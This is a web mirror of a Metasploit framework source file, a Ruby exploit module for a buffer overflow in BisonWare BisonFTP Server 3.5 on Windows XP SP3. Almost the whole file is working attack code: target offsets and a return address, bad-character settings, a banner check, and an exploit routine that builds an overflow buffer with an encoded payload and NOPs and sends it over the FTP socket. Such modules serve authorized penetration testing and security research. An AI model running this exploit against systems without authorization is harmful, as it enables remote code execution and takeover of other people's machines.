CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/bison_ftp_bof.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Ftp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'BisonWare BisonFTP Server Buffer Overflow',

14
      'Description'    => %q{

15
        BisonWare BisonFTP Server 3.5 is prone to an overflow condition.

16
        This module exploits a buffer overflow vulnerability in the said

17
        application.

18
      },

19
      'Platform'       => 'win',

20
      'Author'         =>

21
        [

22
          'localh0t', # initial discovery

23
          'veerendragg @ SecPod', # initial msf

24
          'Jay Turla' # msf

25
        ],

26
      'License'        => MSF_LICENSE,

27
      'References'     =>

28
        [

29
          [ 'CVE', '1999-1510'],

30
          [ 'BID', '49109'],

31
          [ 'EDB', '17649'],

32
          [ 'URL', 'http://secpod.org/msf/bison_server_bof.rb']

33
        ],

34
      'Privileged'     => false,

35
      'DefaultOptions' =>

36
        {

37
          'VERBOSE'  => true

38
        },

39
      'Payload'        =>

40
        {

41
          'Space'           => 310,

42
          'BadChars'        => "\x00\x0a\x0d",

43
          'StackAdjustment' => -3500,

44
        },

45
      'Targets'        =>

46
        [

47
          [ 'Bisonware FTP Server / Windows XP SP3 EN',

48
            {

49
              'Ret'    => 0x0040333f,

50
              'Offset' => 1028,

51
              'Nops'   =>  404

52
            }

53
          ],

54
        ],

55
      'DefaultTarget'  => 0,

56
      'DisclosureDate' => '2011-08-07'))

57
  end

58


59
  def check

60
    connect_login

61
    disconnect

62
    if /BisonWare BisonFTP server product V3\.5/i === banner

63
      return Exploit::CheckCode::Appears

64
    else

65
      return Exploit::CheckCode::Safe

66
    end

67
  end

68


69
  def exploit

70
    connect

71
    print_status('Triggering the prompt for an unregistered product')

72
    sock.put('')

73
    print_status('Disconnecting...')

74
    disconnect

75


76
    print_status('Connecting for the second time to deliver our payload...')

77
    connect #connect for the second time

78


79
    buf = rand_text_alpha(target['Offset'])

80
    buf << payload.encoded

81
    buf << make_nops( (target['Nops']) - payload.encoded.length)

82
    buf << [target.ret].pack('V')

83
    print_status('Sending payload...')

84


85
    sock.put(buf)

86
    handler

87
    disconnect

88
  end

89
end

90


91